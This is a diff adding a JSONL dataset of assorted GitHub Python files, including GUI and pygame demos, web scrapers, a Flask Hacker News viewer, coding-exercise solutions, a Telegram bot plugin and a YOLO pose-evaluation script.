diff --git "a/3665.jsonl" "b/3665.jsonl" new file mode 100644--- /dev/null +++ "b/3665.jsonl" @@ -0,0 +1,1095 @@ +{"seq_id":"20577558985","text":"from manygui import *\nfrom manygui.Utils import log\nfrom manygui.Colors import *\n\n# Not all backends support this -- it is not a part of 0.1:\nfrom manygui import Canvas\n\napp = Application()\nwin = Window(size=(300,300))\napp.add(win)\ncvs = Canvas(size=win.size)\nwin.add(cvs)\n\n#def click(x, y, **kw):\ndef click(e):\n x = e.x\n y = e.y\n log('[Mouse clicked at (%i, %i)]' % (x, y))\n if 30 <= x <= 100 and 30 <= y <= 100:\n log('Yay! You clicked the round rect!')\n\nlink(cvs, Events.LeftClickEvent, click)\n\n# Taken from http://piddle.sourceforge.net/sample1.html\n\ncvs.defaultLineColor = Color(0.7,0.7,1.0) # light blue\nif not backend() in 'text curses'.split():\n cvs.drawLines([(i*10,0,i*10,300) for i in range(30)])\n cvs.drawLines([(0,i*10,300,i*10) for i in range(30)])\ncvs.defaultLineColor = black \n\ncvs.drawLine(10, 200, 20, 190, color=red)\ncvs.drawEllipse(130, 30, 200, 100, fillColor=yellow, edgeWidth=4)\n\ncvs.drawArc(130, 30, 200, 100, 45, 50, fillColor=blue, edgeColor=navy, edgeWidth=4)\n\ncvs.defaultLineWidth = 4\ncvs.drawRoundRect(30, 30, 100, 100, fillColor=blue, edgeColor=maroon)\ncvs.drawCurve(20, 20, 100, 50, 50, 100, 160, 160)\n\n#cvs.drawString(\"This is a test!\", 30,130, Font(face=\"times\",size=16,bold=1), \n# color=green, angle=-45)\n\npolypoints = [(160,120), (130,190), (210,145), (110,145), (190,190)]\ncvs.drawPolygon(polypoints, fillColor=lime, edgeColor=red, edgeWidth=3, closed=1)\n\ncvs.drawRect(200, 200, 260, 260, edgeColor=yellow, edgeWidth=5)\ncvs.drawLine(200, 260, 260, 260, color=green, width=5)\ncvs.drawLine(260, 200, 260, 260, color=red, width=5)\n\n#cvs.flush()\n\napp.run()\n","repo_name":"progval/Manygui","sub_path":"test/test_canvas.py","file_name":"test_canvas.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"72837613","text":"from jinja2 import Environment, FileSystemLoader\n\nimport shutil\nimport time\nimport os\nimport subprocess\nimport json\nfrom typing import List, Dict, Tuple, Any\n\n_apptainer_cmd = None\n\n\ndef get_apptainer_cmd() -> str:\n global _apptainer_cmd\n\n if _apptainer_cmd is not None:\n return _apptainer_cmd\n\n _apptainer_cmd = shutil.which(\"apptainer\")\n if _apptainer_cmd is None:\n _apptainer_cmd = shutil.which(\"singularity\")\n if _apptainer_cmd is None:\n raise RuntimeError(\"apptainer or singularity not found in PATH\")\n\n return _apptainer_cmd\n\ndef run_apptainer(sif_path: str, command: List[str], volumes: List[Tuple[str, str]]) -> Dict[str, Any]:\n\n cmd = [get_apptainer_cmd()]\n\n volumes_tmp = [f\"{v[0]}:{v[1]}\" for v in volumes]\n cmd.extend([\"run\", \"--bind\", \",\".join(volumes_tmp), sif_path])\n cmd.extend(command)\n\n time_0 = time.time()\n proc_result = subprocess.run(cmd, capture_output=True, text=True)\n time_1 = time.time()\n\n if proc_result.returncode == 0:\n return {\"success\": True, \"stdout\": proc_result.stdout}\n else:\n msg = (\n f\"Running in apptainer failed with error code {proc_result.returncode}\\n\"\n f\"stdout: {proc_result.stdout}\\n\"\n f\"stderr: {proc_result.stderr}\"\n )\n\n ret = {\"success\": False, \"error\": {\"error_type\": \"RuntimeError\", \"error_message\": msg}}\n return ret\n \ndef render_input(template_directory: str, template_name: str, inputs: Dict[str, Any], filename: str = None) -> str:\n environment = Environment(loader=FileSystemLoader(template_directory))\n template = environment.get_template(template_name)\n\n if filename is None:\n filename = f\"{'_'.join(list(inputs.keys()))}\"\n\n content = template.render(inputs)\n\n with open(filename, mode=\"w\", encoding=\"utf-8\") as input:\n input.write(content)\n \n return filename\n\ndef process_molecule(molecule_name: str, molecules: List[List[str]]) -> str:\n proc_mol = f\"{molecule_name} {{\\n\"\n for mol in molecules:\n mol_str = \" \"\n for i in range(0,len(mol)):\n mol_str += f\"{mol[i]} \"\n mol_str += \"\\n\"\n \n proc_mol += mol_str\n proc_mol += \"}\"\n return proc_mol\n\ndef render_psi4_input(template_directory: str, template_name: str, inputs: Dict[str, Any], output_path: str, filename: str = None) -> str:\n environment = Environment(loader=FileSystemLoader(template_directory))\n template = environment.get_template(template_name)\n \n hf_methods = [\"HF\", \"MP2\", \"MP4\", \"CCSD(T)\"]\n dft_methods = [\"PBE\", \"B3LYP\", \"M06\", \"M06-D3\"]\n if inputs[\"method\"] in hf_methods:\n inputs[\"reference\"] += \"hf\"\n elif inputs[\"method\"] in dft_methods:\n inputs[\"reference\"] += \"ks\"\n else:\n raise TypeError(\"Method not recognized as HF or DFT method.\")\n\n if filename is None:\n filename = f\"{'_'.join(list(inputs.keys()))}\"\n\n content = template.render(inputs)\n\n with open(output_path+filename, mode=\"w\", encoding=\"utf-8\") as input:\n input.write(content)\n \n return filename\n\n\n# mol_name = \"benzene\"\n# mol_list = [[\"0\", \"1\"],\n# [\"C\", \"-0.332299786126\", \"1.266293763992\", \"-2.614838533626\"],\n# [\"C\", \"0.349364948473\", \"-1.405736084573\", \"-2.053211127230\"],\n# [\"C\", \"1.020488041771\", \"0.885549327624\", \"-2.541894070443\"],\n# [\"C\", \"-1.003239896063\", \"-1.025876820472\", \"-2.129389566957\"],\n# [\"C\", \"-1.344397149122\", \"0.310721315449\", \"-2.406682914582\"],\n# [\"C\", \"1.361021504218\", \"-0.450112768420\", \"-2.258845478849\"],\n# [\"H\", \"-0.597444236584\", \"2.304886349910\", \"-2.828097741910\"],\n# [\"H\", \"0.615252976785\", \"-2.442033294231\", \"-1.829683359417\"],\n# [\"H\", \"1.806668588160\", \"1.628112492256\", \"-2.700437111401\"],\n# [\"H\", \"-1.790003212223\", \"-1.767955258107\", \"-1.970079207440\"],\n# [\"H\", \"-2.394850547123\", \"0.607656321453\", \"-2.458092486410\"],\n# [\"H\", \"2.411449677875\", \"-0.744182632917\", \"-2.193390546325\"]]\n# mol_str = process_molecule(mol_name, mol_list)\n# inputs = {\n# \"calculation\": 'optimize',\n# \"method\": 'HF',\n# \"freeze_core\": 'True',\n# \"reference\": 'r',\n# \"basis_set\": 'aug-cc-pVDZ',\n# \"molecule\": mol_str\n# }\n# with open(\"psi4_test.json\", \"w\") as file:\n# file.write(json.dumps(inputs))\n# print(inputs)\n\n# inputs = {}\n# with open(\"psi4_test.json\", \"r\") as file:\n# inputs = json.load(file)\n\n# filename = \"psi4_test.in\"\n# output_path = \"/mnt/c/Users/Sam_Local/Desktop/Molssi/flask_testing/task_executer/data/\"\n# input_file = render_psi4_input(template_directory=f\"{os.getcwd()+'/templates'}\", template_name=\"input_template\", inputs=inputs, output_path=output_path, filename=filename)\n# commands = [[\"psi4\", \"--version\"], [\"psi4\", \"-i\", f\"/data/{input_file}\", \"-o\", \"/data/output.dat\"]]\n# result = run_apptainer(\"./container/education_container.sif\", commands[1], [[\"/mnt/c/Users/Sam_Local/Desktop/Molssi/flask_testing/task_executer/data\", \"/data\"]])\n# print(result)","repo_name":"sjayellis/ews_backend","sub_path":"task_runner/run_calculation.py","file_name":"run_calculation.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38630380151","text":"'''\nreference\nhttps://clay-atlas.com/blog/2020/11/25/python-cn-sloved-urllib-error-urlerror/\nhttps://itsmycode.com/python-urllib-error-httperror-http-error-403-forbidden/\nhttps://zwindr.blogspot.com/2017/12/python-pyquery.html\nhttps://codertw.com/%E7%A8%8B%E5%BC%8F%E8%AA%9E%E8%A8%80/360045/ \n'''\nimport shutil\nfrom pyquery import PyQuery\nimport ssl\nfrom urllib.request import Request, urlopen\nimport re\nimport requests\nfrom os import path\n\nssl._create_default_https_context = ssl._create_unverified_context\n\nlink = 'https://pokemondb.net/pokedex/all' # pokedex\n\nreq = Request(link, headers={'User-Agent':'Mozilla/5.0'})\nwebpage = urlopen(req).read()\ndom = PyQuery(webpage)\nlinks = dom.find('tr')\n# print(links)\n\npokemons_idx = []\npokemons_name = []\nfor idx, k in enumerate(links.items()):\n id = k.find('.infocard-cell-data').text()\n if not (id in pokemons_idx):\n pokemons_idx.append(id)\n name = k.find('.ent-name').text()\n pokemons_name.append(name)\n\npokemons_data = {}\n# print(len(pokemons_idx))\n# print(len(pokemons_name))\nfor i in range(len(pokemons_name)):\n pokemons_data[pokemons_idx[i]] = pokemons_name[i]\npokemons_data = {k:v for k, v in pokemons_data.items() if v}\n# print(pokemons_data)\n\n\ndoc = PyQuery(url=link)\npokemons_ = doc.find('tr').children()\npokemons_index = pokemons_.find('.infocard-cell-data').text().split(' ')\npokemons_name = pokemons_.find('.ent-name').text().split(' ')\n\n# print(pokemons_index, pokemons_name)\n\npokedex = dict(zip(pokemons_index, pokemons_name))\n# print(pokedex)\n\n# Pokedex Link\npokemons_link = 'https://pokemondb.net/pokedex/all'\n# Get all info from link (html)\ndoc = PyQuery(url=pokemons_link)\n# Get pokemons img src url\npokemons_urls = doc.find('td').find('span').children()\npokemons_img = dict()\n# print(pokemons_urls)\nempty_img = 'https://img.pokemondb.net/s.png' # Filter the empty img\nfor item in pokemons_urls:\n item = PyQuery(item)\n if not re.match(item.attr('data-src'), empty_img):\n url = item.attr('data-src')\n poke_name = str(url).split('/')[-1][:-4]\n pokemons_img[poke_name] = url\n# print(pokemons_img)\n\n# Save the img to db\nfolder = './PyQuery/pokemons/'\nfor img_url in pokemons_img.values():\n img_name = folder + str(img_url).split('/')[-1]\n if path.exists(img_name):\n print('Continuing ...')\n continue\n img_data = requests.get(url=img_url, stream=True)\n if img_data.status_code == 200:\n # Set decode_content be True, otherwise the downloaded image file's size will be zero\n img_data.raw.decode_content = True\n with open(img_name, 'wb') as f:\n shutil.copyfileobj(img_data.raw, f)\n print('Image sucessfully Downloaded: ',img_name)\n else:\n print('Image Couldn\\'t be retreived')\n\n# Regular Expression match testing\nstr1 = 'hello'\nstr2 = ' HellO '\nprint(re.match(str1.lower(), str2.lower())) # Return None\nprint(re.match(str1.lower().strip(), str2.lower().strip())) # Return <0, 5>","repo_name":"justbuyyal/MVCLab-Summer-Course","sub_path":"PyQuery/python_query_test.py","file_name":"python_query_test.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17936234358","text":"## 내 풀이 \ndef solution(answers):\n answer = [0 for i in range(3)]\n pattern1 = [1,2,3,4,5]\n pattern2 = [2,1,2,3,2,4,2,5]\n pattern3 = [3,3,1,1,2,2,4,4,5,5]\n \n for i in range(len(answers)):\n ans = answers[i]\n if(pattern1[i % len(pattern1)] == ans):\n answer[0] += 1\n if(pattern2[i % len(pattern2)] == ans):\n answer[1] += 1\n if(pattern3[i % len(pattern3)] == ans):\n answer[2] += 1 \n \n result = []\n for i in range(len(answer)):\n if(answer[i] == max(answer)):\n result.append(i+1)\n \n return sorted(result)\n\n## 다른 사람의 풀이\n\ndef solution(answers):\n pattern1 = [1,2,3,4,5]\n pattern2 = [2,1,2,3,2,4,2,5]\n pattern3 = [3,3,1,1,2,2,4,4,5,5]\n score = [0, 0, 0]\n result = []\n\n for idx, answer in enumerate(answers):\n if answer == pattern1[idx%len(pattern1)]:\n score[0] += 1\n if answer == pattern2[idx%len(pattern2)]:\n score[1] += 1\n if answer == pattern3[idx%len(pattern3)]:\n score[2] += 1\n\n for idx, s in enumerate(score):\n if s == max(score):\n result.append(idx+1)\n\n return result","repo_name":"GraceKim527/Pygorithm","sub_path":"Programmers/Level 1/모의고사.py","file_name":"모의고사.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20792683493","text":"def remove_Duplicates(nums):\n n = len(nums)\n index = 1\n for i in range( 1,n):\n if nums[i] != nums[i-1]:\n nums[index]= nums[i]\n index += 1\n return index\n\narray = [1,2,3,9,9,9,10,10,20,20,20,20,20,21,21]\nprint(remove_Duplicates(array))","repo_name":"muradtheOZ/problem-solving","sub_path":"one-remove-duplicates-from-array.py","file_name":"one-remove-duplicates-from-array.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20727227802","text":"import io\nfrom operator import mod\nimport sys\n\n_INPUT = \"\"\"\\\nFAC\n\n\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n# ---------------------------------\ns = input()\nss = set([\"ACE\", \"BDF\", \"CEG\", \"DFA\", \"EGB\", \"FAC\", \"GBD\"])\n\nif s in ss:\n print(\"Yes\")\nelse:\n print(\"No\")\n","repo_name":"makima333/Atcoder-ganbaru","sub_path":"contest/abc312/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17118157116","text":"from bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\nfrom unidecode import unidecode\nimport re\nimport time\nfrom selenium import webdriver\n\ndriver = webdriver.PhantomJS(\"/home/vargha/phantomjs-2.1.1-linux-x86_64/bin/phantomjs\")\n\nheader = ['Name', 'Main Web Page', 'Main Image', 'Second Image', 'Third Image', 'Fourth Image', 'Fifth Image',\n 'Sixth Image', 'Seventh Image', 'Eighth Image', 'Ninth Image', 'Tenth Image', 'Price', 'Value of Discount',\n 'Collar', 'Sleeve']\n\n\ndef get_digistyle():\n categories = {\n \"t-shirt\": \"https://www.digistyle.com/category-men-tee-shirts-and-polos/\",\n \"shirt\": \"https://www.digistyle.com/category-men-shirts\",\n \"pants\": \"https://www.digistyle.com/category-men-trousers-jumpsuits\",\n \"jeans\": \"https://www.digistyle.com/category-men-jeans\"\n }\n base_link = \"https://www.digistyle.com\"\n # df = []\n for category_name, category in categories.items():\n df_lst = []\n href_list = []\n browser = webdriver.Firefox()\n browser.get(category)\n len_of_page = browser.execute_script(\n \"window.scrollTo(0, document.body.scrollHeight);var len_of_page=document.body.scrollHeight;return len_of_page;\")\n match = False\n while not match:\n last_count = len_of_page\n time.sleep(10)\n len_of_page = browser.execute_script(\n \"window.scrollTo(0, document.body.scrollHeight);var len_of_page=document.body.scrollHeight;return len_of_page;\")\n if last_count == len_of_page:\n match = True\n\n source_data = browser.page_source\n soup = BeautifulSoup(source_data, features='lxml')\n\n # for p in range(1, 250):\n # file_link = category + str(p)\n # try:\n # page = requests.get(category)\n # except requests.exceptions.ConnectionError:\n # print(f'connection error {file_link}')\n # continue\n # soup = BeautifulSoup(page.content, 'html.parser')\n try:\n ul_cloth_list = soup.find_all(\"div\", class_=\"c-product-grid js-product-grid\")[0]\n a_links = ul_cloth_list.find_all('a')\n if not a_links:\n break\n for link in a_links:\n # if len(link.contents) == 3:\n href = link['href']\n title = href[9:]\n img_link = base_link + href\n if href not in href_list:\n href_list.append(href)\n clothes_filters = ['تی شرت', 'شلوار', 'پیراهن', 'تیشرت']\n if any(clothes in title for clothes in clothes_filters):\n row = [title, img_link]\n try:\n page_ = requests.get(img_link)\n except requests.exceptions.ConnectionError:\n print(f'connection error {img_link}')\n continue\n soup_ = BeautifulSoup(page_.content, 'html.parser')\n image_divs = soup_.find_all('div', class_=\"swiper-wrapper\")\n if len(image_divs) == 0:\n continue\n else:\n image_divs = image_divs[0]\n images = image_divs.find_all('img', class_='c-product-item__image')\n main = [img for img in images if img['alt'][-1] == '1']\n if len(main) != 1:\n continue\n images.insert(0, main[0])\n for img in images:\n img_link = img['src']\n cursor = img_link.find('.jpg')\n img_link = img_link[:cursor + 4]\n if img_link not in row:\n row.append(img_link)\n print(len(row) - 1, \" images has been added!\")\n number_of_pictures = 10 - (len(row) - 2)\n if number_of_pictures != 0:\n for i in range(number_of_pictures):\n row.append([])\n price = soup_.find_all('div', {\n 'class': 'c-price-container c-price-container--quick-view-price-original js-rrp-price'})\n fee = price[0]['data-price-value']\n fee = unidecode(fee)\n fee = fee.replace(\",\", \"\")\n fee = int(fee) * 10\n discount = price[0].next['data-price-value']\n discount = unidecode(discount)\n discount = discount.replace(\",\", \"\")\n if any(char.isdigit() for char in discount):\n discount = ''.join(i for i in discount if i.isdigit())\n discount = int(discount) * 10\n else:\n discount = []\n row.append(fee)\n row.append(discount)\n details = soup_.find_all('ul', {'class': 'c-product__specs-table'})\n details_text = details[0].text\n collar_pattern = r'یقه(\\s*>?\\S.*\\s)'\n sleeve_pattern = r'آستین(\\s*>?\\S.*\\s)'\n if category_name == \"shirt\":\n collar = re.findall(collar_pattern, details_text)\n if not collar:\n row.append([])\n else:\n collar_text = collar[0].replace('\\r', '').replace('\\n', '').replace(' ', '')\n row.append(collar_text)\n\n sleeve = re.findall(sleeve_pattern, details_text)\n if not sleeve:\n row.append(\"بلند\")\n else:\n sleeve_text = sleeve[0].replace('\\r', '').replace('\\n', '').replace(' ', '')\n row.append(sleeve_text)\n elif category_name == 't-shirt':\n collar = re.findall(collar_pattern, details_text)\n if not collar:\n row.append([])\n else:\n collar_text = collar[0].replace('\\r', '').replace('\\n', '').replace(' ', '')\n row.append(collar_text)\n sleeve = re.findall(sleeve_pattern, details_text)\n if not sleeve:\n row.append(\"کوتاه\")\n else:\n sleeve_text = sleeve[0].replace('\\r', '').replace('\\n', '').replace(' ', '')\n row.append(sleeve_text)\n else:\n row.append([])\n row.append([])\n df_lst.append(row)\n df = pd.DataFrame(df_lst, columns=header)\n df.to_csv(f'/home/vargha/Desktop/digi_style_{category_name}_links.csv', columns=header,\n index=False)\n except:\n pass\n\n print(f'category : {category_name} is done: {len(df_lst)}')\n df = pd.DataFrame(df_lst, columns=header)\n df.to_csv(f'/home/vargha/Desktop/digi_style_{category_name}_links.csv', columns=header, index=False)\n\n\nif __name__ == '__main__':\n get_digistyle()\n","repo_name":"Vargha-Kh/Deep-Learning-Practices","sub_path":"Web Crawling For Images/Digistyle/get_digi_style.py","file_name":"get_digi_style.py","file_ext":"py","file_size_in_byte":7746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12686069980","text":"import numpy as np\r\nimport pygame as pg\r\n\r\nclass Player:\r\n def __init__( self, x, y, screen ):\r\n self.x = x\r\n self.y = y\r\n self.img = pg.transform.scale( pg.image.load( 'assets/plane.png' ), ( 32, 32 ) )\r\n self.screen = screen\r\n self.angle = 270.0\r\n self.position = np.array( [ self.x, self.y ] )\r\n self.center = self.position + 16\r\n self.speed = 0.6\r\n self.max_speed = 0.8\r\n self.min_speed = 0.4\r\n self.speed_increment = 0.05\r\n self.delta = np.array( [ np.cos(self.angle), np.sin(self.angle) ] ) * self.speed\r\n self.rotation = 0.0\r\n self.size = 32\r\n self.max_hp = 5\r\n self.hp = self.max_hp\r\n self.ammo = 80\r\n self.bomb_cap = 5\r\n self.current_bombs = self.bomb_cap\r\n \r\n def draw( self ):\r\n rot_angle = 270 - self.angle\r\n rotated = pg.transform.rotate( self.img, rot_angle )\r\n self.screen.blit( rotated, ( self.position[ 0 ], self.position[ 1 ] ) )\r\n # pg.draw.rect( self.screen, [255,0,0], self.get_rect() )\r\n\r\n def increment_speed( self ):\r\n if self.speed < self.max_speed: self.speed += self.speed_increment\r\n if self.speed > self.max_speed: self.speed = self.max_speed\r\n\r\n def decrement_speed( self ):\r\n if self.speed > self.min_speed: self.speed -= self.speed_increment\r\n if self.speed < self.min_speed: self.speed = self.min_speed\r\n\r\n def get_rotation_increment( self ):\r\n if self.speed > 0.75: return 0.15\r\n if self.speed > 0.7: return 0.18\r\n if self.speed > 0.65: return 0.21\r\n if self.speed > 0.6: return 0.24\r\n if self.speed > 0.55: return 0.27\r\n if self.speed > 0.5: return 0.30\r\n else: return 0.33\r\n\r\n def get_rect( self ):\r\n return pg.Rect( self.position + 4, ( self.size - 4, self.size - 4 ) )\r\n \r\n def draw_hearts( self, full: pg.image, empty: pg.image, x_coordinate, y_coordinate ):\r\n for i in range( self.hp ):\r\n self.screen.blit( full, ( x_coordinate - 20 * i, y_coordinate ) )\r\n for i in range( self.max_hp - self.hp ):\r\n self.screen.blit( empty, ( x_coordinate - 20 * ( self.max_hp - 1 - i ), y_coordinate ) )\r\n\r\n def draw_bombs( self, full: pg.image, empty: pg.image, x_coordinate, y_coordinate ):\r\n for i in range( self.current_bombs ):\r\n self.screen.blit( full, ( x_coordinate - 20 * i, y_coordinate ) )\r\n for i in range( self.bomb_cap - self.current_bombs ):\r\n self.screen.blit( empty, ( x_coordinate - 20 * ( self.bomb_cap - 1 - i ), y_coordinate ) )\r\n\r\n def check_borders( self, w, h ):\r\n if self.position[ 0 ] + 5 * self.delta[ 0 ] < 0: self.position[ 0 ] = 0\r\n if self.position[ 0 ] + 5 * self.delta[ 0 ] > w - self.size: self.position[ 0 ] = w - self.size\r\n if self.position[ 1 ] + 5 * self.delta[ 1 ] < 0: self.position[ 1 ] = 0\r\n if self.position[ 1 ] + 5 * self.delta[ 1 ] > h - self.size: self.position[ 1 ] = h - self.size\r\n\r\n def update( self ):\r\n a = self.angle\r\n s = self.speed\r\n self.position += self.delta\r\n self.center = self.position + 16\r\n self.delta[ 0 ] = s * np.cos( a * np.pi / 180 )\r\n self.delta[ 1 ] = s * np.sin( a * np.pi / 180 )\r\n self.angle += self.rotation\r\n","repo_name":"PrinceOfCzechia/Dogfight","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25924867413","text":"import requests\nfrom flask import Flask, render_template, request\nimport json\nimport os\nos.system('clear')\n\nbase_url = \"http://hn.algolia.com/api/v1\"\n\n# This URL gets the newest stories.\nnew = f\"{base_url}/search_by_date?tags=story\"\n\n# This URL gets the most popular stories\npopular = f\"{base_url}/search?tags=story\"\n\n\n# This function makes the URL to get the detail of a storie by id.\n# Heres the documentation: https://hn.algolia.com/api\ndef make_detail_url(id):\n return f\"{base_url}/items/{id}\"\n\n\ndb = {}\napp = Flask(\"DayNine\")\n\ndef get_html(html):\n list_hits = []\n result_html = requests.get(html)\n html_html = json.loads(result_html.text)\n hits = html_html['hits']\n for hit in hits:\n html_row = {\n 'title': hit['title'],\n 'url': hit['url'],\n 'author': hit['author'],\n 'points': hit['points'],\n 'num_comments': hit['num_comments'],\n 'objectID': hit['objectID']\n }\n list_hits.append(html_row)\n \n return list_hits\n\n\n@app.route(\"/\")\ndef index():\n order_by = request.args.get('order by')\n if order_by:\n if order_by == 'new':\n if db.get(order_by):\n list_hits = db.get(order_by)\n else:\n list_hits = get_html(new)\n db[order_by] = list_hits\n elif order_by == 'popular':\n list_hits = db.get(order_by)\n else:\n list_hits = get_html(popular)\n order_by = 'popular'\n db[order_by] = list_hits\n order_by = order_by.capitalize()\n\n return render_template(\"index.html\", list_hits = list_hits, order_by = order_by)\n\n@app.route(\"/\")\ndef detail(objectID):\n result_detail = requests.get(make_detail_url(objectID))\n html_detail = json.loads(result_detail.text)\n\n return render_template(\"detail.html\", html_detail = html_detail)\n\n\napp.run(host=\"0.0.0.0\")\n","repo_name":"zpdl95/python-scrapper","sub_path":"challenge/day-7-blueprint.py","file_name":"day-7-blueprint.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8415049298","text":"import os\nimport http.client\nimport json\nimport time\nimport sys\nimport getopt\n\n\ndef usage():\n ''' Display program usage. '''\n progname = os.path.split(sys.argv[0])[1]\n if os.path.splitext(progname)[1] in ['.py', '.pyc']:\n progname = 'python ' + progname\n return 'Usage: %s [--host=...] <--port=...> [--method=...]' % progname\n\n\ndef get_rpc_stat(host, port):\n conn = http.client.HTTPConnection(host, port)\n conn.request('GET', '/inspect/rpc_stats')\n data = conn.getresponse().read()\n conn.close()\n return json.loads(data.decode('utf-8'))\n\n\ndef dump_stat_periodically(host, port, method):\n i = 0\n while i < 60:\n if i % 15 == 0:\n detail = '|reqs succ fail min/max/avg(ms)| in each cloumn'\n print('stating %s:%s:%s\\n%s' % (host, port, method, detail))\n print('%s%s%s%s' %\n ('|--in last second----|', '---in last minute----|',\n '-------in last hour-------|',\n '-----------since start--------|'))\n data = get_rpc_stat(host, port)[method]\n ct_total = data['counter']['total']\n ct_succ = data['counter']['success']\n ct_fail = data['counter']['failure']\n line = ''\n for k in ['last_second', 'last_minute', 'last_hour', 'total']:\n latency = data['latency'][k]\n line += '%4s %4s %4s %s/%s/%s' % (\n ct_total[k], ct_succ[k], ct_fail[k], latency['min'],\n latency['max'], latency['average']) + '|'\n line = line[:-1]\n print(line)\n time.sleep(1)\n i = i + 1\n\n\n\ndef main():\n opts, args = getopt.getopt(sys.argv[1:], '',\n ['host=', 'port=', 'method=', 'help'])\n if '--help' in opts:\n print(usage())\n sys.exit(0)\n\n host = '127.0.0.1'\n port = 0\n method = 'global'\n for o, a in opts:\n if o in '--host':\n host = a\n elif o in '--port':\n port = a\n elif o in '--method':\n method = a\n\n if port == 0:\n print(usage())\n sys.exit(-1)\n\n dump_stat_periodically(host, port, method)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Tencent/flare","sub_path":"flare/tools/rpc_stat.py","file_name":"rpc_stat.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":1199,"dataset":"github-code","pt":"21"} +{"seq_id":"35394525352","text":"\"\"\"Get info about a File Extension\nSyntax: .filext EXTENSION\"\"\"\nimport requests\nfrom bs4 import BeautifulSoup\nfrom uniborg.util import admin_cmd\n\nfrom telebot import CMD_HELP\n\n\n@telebot.on(admin_cmd(pattern=\"filext (.*)\"))\n@telebot.on(admin_cmd(pattern=\"filext (.*)\", allow_sudo=True))\nasync def _(event):\n if event.fwd_from:\n return\n await eor(event, \"Processing ...\")\n sample_url = \"https://www.fileext.com/file-extension/{}.html\"\n input_str = event.pattern_match.group(1).lower()\n response_api = requests.get(sample_url.format(input_str))\n status_code = response_api.status_code\n if status_code == 200:\n raw_html = response_api.content\n soup = BeautifulSoup(raw_html, \"html.parser\")\n ext_details = soup.find_all(\"td\", {\"colspan\": \"3\"})[-1].text\n await eor(\n event,\n \"**File Extension**: `{}`\\n**Description**: `{}`\".format(\n input_str, ext_details\n ),\n )\n else:\n await eor(\n event,\n \"https://www.fileext.com/ responded with {} for query: {}\".format(\n status_code, input_str\n ),\n )\n\n\nCMD_HELP.update(\n {\"fileext\": \".fileext \\nUse - Get info on that file extension.\"}\n)\n","repo_name":"xditya/TeleBot","sub_path":"telebot/plugins/fileext.py","file_name":"fileext.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":197,"dataset":"github-code","pt":"21"} +{"seq_id":"40074302291","text":"#! /usr/bin/env python\n\nimport os\nimport cv2\nimport matplotlib.pyplot as plt\nfrom frontend import YOLO\nimport json\nimport pandas as pd\n\n\n''' This file will read the video file created from the images (see img2video.py), it will run it through the\nmodified network and get the pose_x. It will then calculate the error abs(actual-predicted), and the plot it '''\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\" # \"0\" use cpu\n\n# CONFIGURATION\nimage_path = '/home/ubuntu/tensorflow_data/output.mp4'\nconfig_path = 'config_cargo_door.json'\nweights_path = '/home/ubuntu/tensorflow_data/YOLO/CargoDoor/full_yolo_cargo_door_with_pose_v6.h5'\n\nwith open(config_path) as config_buffer:\n config = json.load(config_buffer)\n\n###############################\n# Make the model\n###############################\nyolo = YOLO(architecture=config['model']['architecture'],\n input_size=config['model']['input_size'],\n labels=config['model']['labels'],\n max_box_per_image=config['model']['max_box_per_image'],\n anchors=config['model']['anchors'])\n\n###############################\n# Load trained weights\n###############################\nprint(weights_path)\nyolo.load_weights(weights_path)\n\n###############################\n# Load true pose data\n###############################\ncsv_filename = '/home/ubuntu/catkin_ws/src/Northstar/airplane_loader/scripts/image_pose_data.csv'\ntrue_pose_x = pd.read_csv(csv_filename, usecols=['pose_x'])\ntrue_pose_x = true_pose_x.values\n\n###############################\n# Run modified yolo\n###############################\ncounter = 0\n\nif image_path[-4:] == '.mp4':\n video_reader = cv2.VideoCapture(image_path)\n\n nb_frames = int(video_reader.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))\n print(\"The number of frames are: \" + str(nb_frames + 1))\n frame_h = int(video_reader.get(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT))\n frame_w = int(video_reader.get(cv2.cv.CV_CAP_PROP_FRAME_WIDTH))\n\n error = [] # store per image rpy loss in an list\n pred_pose_list = []\n true_pose_list = []\n\n for i in range(nb_frames):\n print(\"\\npredicting for frame: \" + str(i))\n _, image = video_reader.read()\n _, rpy = yolo.predict(image)\n #print(rpy)\n # print(\"true_pose_x: \" + str(true_pose_x[i]) + \"\\tpredicted pose_x: \" + str(rpy[0]))\n if any(rpy):\n loss = abs(true_pose_x[i] - rpy[0])\n error.append(loss)\n pred_pose_list.append(rpy[0])\n true_pose_list.append(true_pose_x[i])\n\n\n samples = [s for s in range(len(true_pose_list))]\n plt.plot(samples, true_pose_list, color='skyblue')\n plt.plot(samples, pred_pose_list, color='red')\n plt.xlabel('frames with detected CargoDoors')\n plt.title('True(blue) vs Predicted(red) values for pose_x using modified YOLO')\n plt.ylabel('pose_x in radians')\n plt.show()\n 